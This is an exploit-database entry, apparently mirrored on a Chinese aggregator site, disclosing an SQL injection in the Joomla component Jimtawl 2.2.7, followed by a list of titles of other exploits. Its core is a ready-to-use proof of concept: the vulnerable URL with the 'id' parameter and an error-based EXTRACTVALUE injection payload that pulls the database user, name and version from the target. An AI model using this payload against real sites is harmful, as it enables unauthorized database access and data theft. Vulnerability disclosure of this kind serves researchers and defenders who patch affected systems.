Joomla! Component Jimtawl 2.2.7 – ‘id’ SQL Injection

Exploit Database
21 阅读

作者： Ihsan Sencan

日期： 2018-10-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/45524/

# Exploit Title: Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-10-03
# Vendor Homepage: https://janguo.de/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/collection-factory/
# Software Download: https://vd.janguo.de/attachments/download/191/pkg_jimtawl-2.2.8-current-r569.zip
# Version: 2.2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: NA

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_jimtawl&view=user&task=user.edit&id=[SQL]

' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))-- VerAyari

last Exploits
Joomla! Component Jimtawl 2.2.7 – ‘id’ SQL Injection的更多信息

Joomla! Component Table JX – Cross-Site Scripting：
The Don 1.0.1 – ‘login’ SQL Injection：
WordPress Theme Daily Deal – Arbitrary File Upload：
Joomla! Component com_linkr – Local File Inclusion：
ManageEngine Mobile Application Manager 10 – SQL Injection：
Joomla! Component JE Portfolio Creator 1.2 – ‘d_itemid’ SQL Injection：
D-Link DIR-615 Rev D3 / DIR-300 Rev A – Multiple Vulnerabilities：
Basic Analysis and Security Engine (BASE) 1.4.5 – ‘base_qry_common.php?base_path’ Remote File Inclusion：